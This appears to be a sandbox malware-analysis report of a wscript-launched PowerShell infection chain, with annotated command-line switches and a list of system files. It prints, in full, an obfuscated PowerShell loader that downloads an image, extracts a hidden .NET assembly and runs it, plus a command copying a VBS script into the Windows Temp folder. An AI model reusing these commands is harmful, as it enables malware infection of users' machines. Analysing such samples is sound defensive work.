QUHOWdGtçceVUHOWdGtçceB5UHOWdGtçceHUHOWdGtçceUHOWdGtçceZQUHOWdGtçceoUHOWdGtçceCcUHOWdGtçceRgBpUHOWdGtçceGIUHOWdGtçceZQByUHOWdGtçceC4UHOWdGtçceSUHOWdGtçceBvUHOWdGtçceG0UHOWdGtçceZQUHOWdGtçcenUHOWdGtçceCkUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceG0UHOWdGtçceZQB0UHOWdGtçceGgUHOWdGtçcebwBkUHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcedUHOWdGtçceB5UHOWdGtçceHUHOWdGtçceUHOWdGtçceZQUHOWdGtçceuUHOWdGtçceEcUHOWdGtçceZQB0UHOWdGtçceE0UHOWdGtçceZQB0UHOWdGtçceGgUHOWdGtçcebwBkUHOWdGtçceCgUHOWdGtçceJwBWUHOWdGtçceEEUHOWdGtçceSQUHOWdGtçcenUHOWdGtçceCkUHOWdGtçceLgBJUHOWdGtçceG4UHOWdGtçcedgBvUHOWdGtçceGsUHOWdGtçceZQUHOWdGtçceoUHOWdGtçceCQUHOWdGtçcebgB1UHOWdGtçceGwUHOWdGtçcebUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceWwBvUHOWdGtçceGIUHOWdGtçceagBlUHOWdGtçceGMUHOWdGtçcedUHOWdGtçceBbUHOWdGtçceF0UHOWdGtçceXQUHOWdGtçcegUHOWdGtçceCgUHOWdGtçceJwBkUHOWdGtçceEgUHOWdGtçceaUHOWdGtçceUHOWdGtçcewUHOWdGtçceEwUHOWdGtçcebUHOWdGtçceBKUHOWdGtçceFUUHOWdGtçceUwBDUHOWdGtçceDkUHOWdGtçceegBkUHOWdGtçceDIUHOWdGtçceOQBrUHOWdGtçceGIUHOWdGtçcebQBsUHOWdGtçceDMUHOWdGtçceTUHOWdGtçceB6UHOWdGtçceFEUHOWdGtçceMQBNUHOWdGtçceFMUHOWdGtçceNUHOWdGtçceUHOWdGtçcewUHOWdGtçceE4UHOWdGtçceaQUHOWdGtçce0UHOWdGtçceHoUHOWdGtçceTUHOWdGtçceBqUHOWdGtçceEkUHOWdGtçceNQBNUHOWdGtçceFMUHOWdGtçceOUHOWdGtçceB2UHOWdGtçceE8UHOWdGtçcebgBCUHOWdGtçceDUHOWdGtçceUHOWdGtçceZUHOWdGtçceBHUHOWdGtçceGcUHOWdGtçcePQUHOWdGtçcenUHOWdGtçceCUHOWdGtçceUHOWdGtçceLUHOWdGtçceUHOWdGtçcegUHOWdGtçceCcUHOWdGtçceJwUHOWdGtçcegUHOWdGtçceCwUHOWdGtçceIUHOWdGtçceUHOWdGtçcenUHOWdGtçceDIUHOWdGtçceJwUHOWdGtçcegUHOWdGtçceCwUHOWdGtçceIUHOWdGtçceUHOWdGtçcenUHOWdGtçceHIUHOWdGtçceZQBnUHOWdGtçceGEUHOWdGtçcecwBtUHOWdGtçceCcUHOWdGtçceIUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJwUHOWdGtçce1UHOWdGtçceCcUHOWdGtçceIUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJwBDUHOWdGtçceDoUHOWdGtçceXUHOWdGtçceBXUHOWdGtçceGkUHOWdGtçcebgBkUHOWdGtçceG8UHOWdGtçcedwBzUHOWdGtçceFwUHOWdGtçceVUHOWdGtçceBlUHOWdGtçceG0UHOWdGtçcecUHOWdGtçceBcUHOWdGtçceCcUHOWdGtçceLUHOWdGtçceUHOWdGtçcegUHOWdGtçceCcUHOWdGtçceaUHOWdGtçceB0UHOWdGtçceG0UHOWdGtçcebUHOWdGtçceBjUHOWdGtçceCcUHOWdGtçceKQUHOWdGtçcepUHOWdGtçceUHOWdGtçce==';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('UHOWdGtçce','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
parent_process wscript.exe martian_process powershell.exe -WindowStyle Hidden if (-not (Get-ChildItem C:\Windows\Temp\*.vbs)) { Copy-Item -Path *.vbs -Destination C:\Windows\Temp\regasm.vbs -Force }
parent_process wscript.exe martian_process powershell -command "$Codigo = 'JUHOWdGtçceBpUHOWdGtçceG0UHOWdGtçceYQBnUHOWdGtçceGUUHOWdGtçceVQByUHOWdGtçceGwUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJwBoUHOWdGtçceHQUHOWdGtçcedUHOWdGtçceBwUHOWdGtçceHMUHOWdGtçceOgUHOWdGtçcevUHOWdGtçceC8UHOWdGtçcedQBwUHOWdGtçceGwUHOWdGtçcebwBhUHOWdGtçceGQUHOWdGtçceZUHOWdGtçceBlUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBuUHOWdGtçceHMUHOWdGtçceLgBjUHOWdGtçceG8UHOWdGtçcebQUHOWdGtçceuUHOWdGtçceGIUHOWdGtçcecgUHOWdGtçcevUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBzUHOWdGtçceC8UHOWdGtçceMUHOWdGtçceUHOWdGtçcewUHOWdGtçceDQUHOWdGtçceLwUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceNUHOWdGtçceUHOWdGtçcevUHOWdGtçceDcUHOWdGtçceNUHOWdGtçceUHOWdGtçce5UHOWdGtçceC8UHOWdGtçcebwByUHOWdGtçceGkUHOWdGtçceZwBpUHOWdGtçceG4UHOWdGtçceYQBsUHOWdGtçceC8UHOWdGtçcebgBlUHOWdGtçceHcUHOWdGtçceXwBpUHOWdGtçceG0UHOWdGtçceYQBnUHOWdGtçceGUUHOWdGtçceLgBqUHOWdGtçceHUHOWdGtçceUHOWdGtçceZwUHOWdGtçce/UHOWdGtçceDEUHOWdGtçceNgUHOWdGtçce5UHOWdGtçceDgUHOWdGtçceMUHOWdGtçceUHOWdGtçce4UHOWdGtçceDQUHOWdGtçceNQUHOWdGtçceyUHOWdGtçceDMUHOWdGtçceJwUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcedwBlUHOWdGtçceGIUHOWdGtçceQwBsUHOWdGtçceGkUHOWdGtçceZQBuUHOWdGtçceHQUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceTgBlUHOWdGtçceHcUHOWdGtçceLQBPUHOWdGtçceGIUHOWdGtçceagBlUHOWdGtçceGMUHOWdGtçcedUHOWdGtçceUHOWdGtçcegUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceTgBlUHOWdGtçceHQUHOWdGtçceLgBXUHOWdGtçceGUUHOWdGtçceYgBDUHOWdGtçceGwUHOWdGtçceaQBlUHOWdGtçceG4UHOWdGtçcedUHOWdGtçceUHOWdGtçce7UHOWdGtçceCQUHOWdGtçceaQBtUHOWdGtçceGEUHOWdGtçceZwBlUHOWdGtçceEIUHOWdGtçceeQB0UHOWdGtçceGUUHOWdGtçcecwUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceUHOWdGtçcekUHOWdGtçceHcUHOWdGtçceZQBiUHOWdGtçceEMUHOWdGtçcebUHOWdGtçceBpUHOWdGtçceGUUHOWdGtçcebgB0UHOWdGtçceC4UHOWdGtçceRUHOWdGtçceBvUHOWdGtçceHcUHOWdGtçcebgBsUHOWdGtçceG8UHOWdGtçceYQBkUHOWdGtçceEQUHOWdGtçceYQB0UHOWdGtçceGEUHOWdGtçceKUHOWdGtçceUHOWdGtçcekUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBVUHOWdGtçceHIUHOWdGtçcebUHOWdGtçceUHOWdGtçcepUHOWdGtçceDsUHOWdGtçceJUHOWdGtçceBpUHOWdGtçceG0UHOWdGtçceYQBnUHOWdGtçceGUUHOWdGtçceVUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçcedUHOWdGtçceUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceBbUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceVUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçcedUHOWdGtçceUHOWdGtçceuUHOWdGtçceEUUHOWdGtçcebgBjUHOWdGtçceG8UHOWdGtçceZUHOWdGtçceBpUHOWdGtçceG4UHOWdGtçceZwBdUHOWdGtçceDoUHOWdGtçceOgBVUHOWdGtçceFQUHOWdGtçceRgUHOWdGtçce4UHOWdGtçceC4UHOWdGtçceRwBlUHOWdGtçceHQUHOWdGtçceUwB0UHOWdGtçceHIUHOWdGtçceaQBuUHOWdGtçceGcUHOWdGtçceKUHOWdGtçceUHOWdGtçcekUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBCUHOWdGtçceHkUHOWdGtçcedUHOWdGtçceBlUHOWdGtçceHMUHOWdGtçceKQUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJwUHOWdGtçce8UHOWdGtçceDwUHOWdGtçceQgBBUHOWdGtçceFMUHOWdGtçceRQUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceXwBTUHOWdGtçceFQUHOWdGtçceQQBSUHOWdGtçceFQUHOWdGtçcePgUHOWdGtçce+UHOWdGtçceCcUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceGUUHOWdGtçcebgBkUHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJwUHOWdGtçce8UHOWdGtçceDwUHOWdGtçceQgBBUHOWdGtçceFMUHOWdGtçceRQUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceXwBFUHOWdGtçceE4UHOWdGtçceRUHOWdGtçceUHOWdGtçce+UHOWdGtçceD4UHOWdGtçceJwUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceUHOWdGtçcekUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBUUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceB0UHOWdGtçceC4UHOWdGtçceSQBuUHOWdGtçceGQUHOWdGtçceZQB4UHOWdGtçceE8UHOWdGtçceZgUHOWdGtçceoUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceKQUHOWdGtçce7UHOWdGtçceCQUHOWdGtçceZQBuUHOWdGtçceGQUHOWdGtçceSQBuUHOWdGtçceGQUHOWdGtçceZQB4UHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçceaQBtUHOWdGtçceGEUHOWdGtçceZwBlUHOWdGtçceFQUHOWdGtçceZQB4UHOWdGtçceHQUHOWdGtçceLgBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceTwBmUHOWdGtçceCgUHOWdGtçceJUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBGUHOWdGtçceGwUHOWdGtçceYQBnUHOWdGtçceCkUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceHMUHOWdGtçcedUHOWdGtçceBhUHOWdGtçceHIUHOWdGtçcedUHOWdGtçceBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceGcUHOWdGtçceZQUHOWdGtçcegUHOWdGtçceDUHOWdGtçceUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceGcUHOWdGtçcedUHOWdGtçceUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçcegUHOWdGtçceCsUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceLgBMUHOWdGtçceGUUHOWdGtçcebgBnUHOWdGtçceHQUHOWdGtçceaUHOWdGtçceUHOWdGtçce7UHOWdGtçceCQUHOWdGtçceYgBhUHOWdGtçceHMUHOWdGtçceZQUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceTUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZwB0UHOWdGtçceGgUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBzUHOWdGtçceHQUHOWdGtçceYQByUHOWdGtçceHQUHOWdGtçceSQBuUHOWdGtçceGQUHOWdGtçceZQB4UHOWdGtçceDsUHOWdGtçceJUHOWdGtçceBiUHOWdGtçceGEUHOWdGtçcecwBlUHOWdGtçceDYUHOWdGtçceNUHOWdGtçceBDUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçceaQBtUHOWdGtçceGEUHOWdGtçceZwBlUHOWdGtçceFQUHOWdGtçceZQB4UHOWdGtçceHQUHOWdGtçceLgBTUHOWdGtçceHUUHOWdGtçceYgBzUHOWdGtçceHQUHOWdGtçcecgBpUHOWdGtçceG4UHOWdGtçceZwUHOWdGtçceoUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBiUHOWdGtçceGEUHOWdGtçcecwBlUHOWdGtçceDYUHOWdGtçceNUHOWdGtçceBMUHOWdGtçceGUUHOWdGtçcebgBnUHOWdGtçceHQUHOWdGtçceaUHOWdGtçceUHOWdGtçcepUHOWdGtçceDsUHOWdGtçceJUHOWdGtçceBjUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceEIUHOWdGtçceeQB0UHOWdGtçceGUUHOWdGtçcecwUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceBbUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceQwBvUHOWdGtçceG4UHOWdGtçcedgBlUHOWdGtçceHIUHOWdGtçcedUHOWdGtçceBdUHOWdGtçceDoUHOWdGtçceOgBGUHOWdGtçceHIUHOWdGtçcebwBtUHOWdGtçceEIUHOWdGtçceYQBzUHOWdGtçceGUUHOWdGtçceNgUHOWdGtçce0UHOWdGtçceFMUHOWdGtçcedUHOWdGtçceByUHOWdGtçceGkUHOWdGtçcebgBnUHOWdGtçceCgUHOWdGtçceJUHOWdGtçceBiUHOWdGtçceGEUHOWdGtçcecwBlUHOWdGtçceDYUHOWdGtçceNUHOWdGtçceBDUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceCkUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceGwUHOWdGtçcebwBhUHOWdGtçceGQUHOWdGtçceZQBkUHOWdGtçceEEUHOWdGtçcecwBzUHOWdGtçceGUUHOWdGtçcebQBiUHOWdGtçceGwUHOWdGtçceeQUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceBbUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceUgBlUHOWdGtçceGYUHOWdGtçcebUHOWdGtçceBlUHOWdGtçceGMUHOWdGtçcedUHOWdGtçceBpUHOWdGtçceG8UHOWdGtçcebgUHOWdGtçceuUHOWdGtçceEEUHOWdGtçcecwBzUHOWdGtçceGUUHOWdGtçcebQBiUHOWdGtçceGwUHOWdGtçceeQBdUHOWdGtçceDoUHOWdGtçceOgBMUHOWdGtçceG8UHOWdGtçceYQBkUHOWdGtçceCgUHOWdGtçceJUHOWdGtçceBjUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceEIUHOWdGtçceeQB0UHOWdGtçceGUUHOWdGtçcecwUHOWdGtçcepUHOWdGtçceDsUHOWdGtçceJUHOWdGtçceB0UHOWdGtçceHkUHOWdGtçcecUHOWdGtçceBlUHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcebUHOWdGtçceBvUHOWdGtçceGEUHOWdGtçceZUHOWdGtçceBlUHOWdGtçceGQUHOWdGtçceQQBzUHOWdGtçceHMUHOWdGtçceZQBtUHOWdGtçceGIUHOWdGtçcebUHOWdGtçceB5UHOWdGtçceC4UHOWdGtçceRwBlUHOWdGtçceHQUHOWdGtçceVUHOWdGtçceB5UHOWdGtçceHUHOWdGtçceUHOWdGtçceZQUHOWdGtçceoUHOWdGtçceCcUHOWdGtçceRgBpUHOWdGtçceGIUHOWdGtçceZQByUHOWdGtçceC4UHOWdGtçceSUHOWdGtçceBvUHOWdGtçceG0UHOWdGtçceZQUHOWdGtçcenUHOWdGtçceCkUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceG0UHOWdGtçceZQB0UHOWdGtçceGgUHOWdGtçcebwBkUHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcedUHOWdGtçceB5UHOWdGtçceHUHOWdGtçceUHOWdGtçceZQUHOWdGtçceuUHOWdGtçceEcUHOWdGtçceZQB0UHOWdGtçceE0UHOWdGtçceZQB0UHOWdGtçceGgUHOWdGtçcebwBkUHOWdGtçceCgUHOWdGtçceJwBWUHOWdGtçceEEUHOWdGtçceSQUHOWdGtçcenUHOWdGtçceCkUHOWdGtçceLgBJUHOWdGtçceG4UHOWdGtçcedgBvUHOWdGtçceGsUHOWdGtçceZQUHOWdGtçceoUHOWdGtçceCQUHOWdGtçcebgB1UHOWdGtçceGwUHOWdGtçcebUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceWwBvUHOWdGtçceGIUHOWdGtçceagBlUHOWdGtçceGMUHOWdGtçcedUHOWdGtçceBbUHOWdGtçceF0UHOWdGtçceXQUHOWdGtçcegUHOWdGtçceCgUHOWdGtçceJwBkUHOWdGtçceEgUHOWdGtçceaUHOWdGtçceUHOWdGtçcewUHOWdGtçceEwUHOWdGtçcebUHOWdGtçceBKUHOWdGtçceFUUHOWdGtçceUwBDUHOWdGtçceDkUHOWdGtçceegBkUHOWdGtçceDIUHOWdGtçceOQBrUHOWdGtçceGIUHOWdGtçcebQBsUHOWdGtçceDMUHOWdGtçceTUHOWdGtçceB6UHOWdGtçceFEUHOWdGtçceMQBNUHOWdGtçceFMUHOWdGtçceNUHOWdGtçceUHOWdGtçcewUHOWdGtçceE4UHOWdGtçceaQUHOWdGtçce0UHOWdGtçceHoUHOWdGtçceTUHOWdGtçceBqUHOWdGtçceEkUHOWdGtçceNQBNUHOWdGtçceFMUHOWdGtçceOUHOWdGtçceB2UHOWdGtçceE8UHOWdGtçcebgBCUHOWdGtçceDUHOWdGtçceUHOWdGtçceZUHOWdGtçceBHUHOWdGtçceGcUHOWdGtçcePQUHOWdGtçcenUHOWdGtçceCUHOWdGtçceUHOWdGtçceLUHOWdGtçceUHOWdGtçcegUHOWdGtçceCcUHOWdGtçceJwUHOWdGtçcegUHOWdGtçceCwUHOWdGtçceIUHOWdGtçceUHOWdGtçcenUHOWdGtçceDIUHOWdGtçceJwUHOWdGtçcegUHOWdGtçceCwUHOWdGtçceIUHOWdGtçceUHOWdGtçcenUHOWdGtçceHIUHOWdGtçceZQBnUHOWdGtçceGEUHOWdGtçcecwBtUHOWdGtçceCcUHOWdGtçceIUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJwUHOWdGtçce1UHOWdGtçceCcUHOWdGtçceIUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJwBDUHOWdGtçceDoUHOWdGtçceXUHOWdGtçceBXUHOWdGtçceGkUHOWdGtçcebgBkUHOWdGtçceG8UHOWdGtçcedwBzUHOWdGtçceFwUHOWdGtçceVUHOWdGtçceBlUHOWdGtçceG0UHOWdGtçcecUHOWdGtçceBcUHOWdGtçceCcUHOWdGtçceLUHOWdGtçceUHOWdGtçcegUHOWdGtçceCcUHOWdGtçceaUHOWdGtçceB0UHOWdGtçceG0UHOWdGtçcebUHOWdGtçceBjUHOWdGtçceCcUHOWdGtçceKQUHOWdGtçcepUHOWdGtçceUHOWdGtçce==';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('UHOWdGtçce','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
option -windowstyle hidden value Attempts to execute command with a hidden window
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -windowstyle hidden value Attempts to execute command with a hidden window
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe